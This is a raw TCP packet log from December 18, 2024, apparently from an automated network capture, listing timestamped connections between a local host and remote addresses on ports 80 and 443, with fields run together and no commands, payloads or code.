                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600605965 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600631952 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600687981 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600699902 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600729942 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600744009 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.606374979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.608620882 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612092018 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612142086 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612169027 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612176895 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612225056 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.618927002 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.618985891 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619009018 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619024038 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619054079 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619070053 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.621242046 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623847008 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623904943 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623918056 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623925924 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623965979 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.624125004 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626558065 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626600981 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626650095 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626663923 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626699924 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631617069 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631665945 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631694078 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631712914 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631733894 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631752014 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635245085 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635292053 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635335922 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635355949 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635374069 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.725519896 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.729965925 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.729981899 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.730030060 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731534958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731548071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.731586933 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735456944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735471010 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.735528946 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737507105 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737519979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.737577915 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740144014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740158081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.740219116 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743174076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743185997 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.743247986 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746860027 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746872902 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.746905088 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.749953032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.749967098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.750000954 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.751658916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.753477097 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.753520966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755374908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755388975 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.755419016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758049965 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758063078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.758099079 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.760711908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.761437893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.761487961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.762610912 CET49780443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.763714075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.764298916 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.764338970 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766488075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766536951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.766835928 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.769138098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.770190001 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.770271063 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772687912 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772700071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.772762060 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774712086 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774744987 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774789095 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774805069 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774832964 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.774846077 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776309967 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776324034 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.776395082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.779975891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.779989958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.780050993 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786060095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786073923 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.786123991 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788088083 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788115978 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788149118 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788163900 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788199902 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.788243055 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789105892 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789125919 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789221048 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789228916 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.789318085 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790771008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790785074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.790844917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.795452118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.796677113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.796737909 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802058935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802072048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.802153111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804033995 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804039001 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804059029 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804059982 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804137945 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804141998 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804152012 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804164886 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804166079 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804172039 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804198027 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.804225922 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807054043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807065964 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.807125092 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.894639969 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895612001 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895659924 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.895757914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897386074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897402048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.897459030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898196936 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898210049 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.898241043 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899451971 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899466991 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.899497986 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.900527954 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.900784016 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901738882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901793003 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901835918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.901892900 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903162956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903177023 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.903250933 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904234886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904339075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.904388905 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905424118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905467987 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.905519962 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906723022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906735897 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.906760931 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.907855988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.907912016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.908097029 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909215927 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909228086 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.909248114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910367966 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910403013 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.910440922 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911626101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911638021 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.911674976 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912733078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912776947 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.912832022 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.913997889 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.914047956 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.914088011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915134907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915182114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.915354013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916328907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916377068 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.916594028 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917596102 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917690992 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.917810917 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.918816090 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.918867111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.919070959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.919979095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.920018911 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.920095921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921211958 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921261072 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.921400070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922580957 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922594070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.922616959 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923742056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923818111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.923921108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.924813986 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.924998045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.925045013 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926079035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926186085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.926234007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927246094 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927290916 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.927359104 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928494930 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928602934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.928647041 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929799080 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929816008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.929847002 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930879116 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930891037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.930923939 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.931957960 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.931971073 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932014942 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932955027 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.932991028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.933044910 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934120893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934134007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.934237003 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042690992 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042710066 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042747021 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042758942 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042779922 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.042795897 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046238899 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046247959 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046299934 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.046304941 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062370062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062381983 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062433004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062860012 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062870979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.062922001 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063819885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063832045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.063874006 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064394951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064405918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.064436913 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065248013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065258980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.065294027 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066052914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066791058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066802025 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.066832066 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067683935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067699909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.067732096 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068511963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068521976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.068552971 CET4977680192.168.2.6139.99.188.124
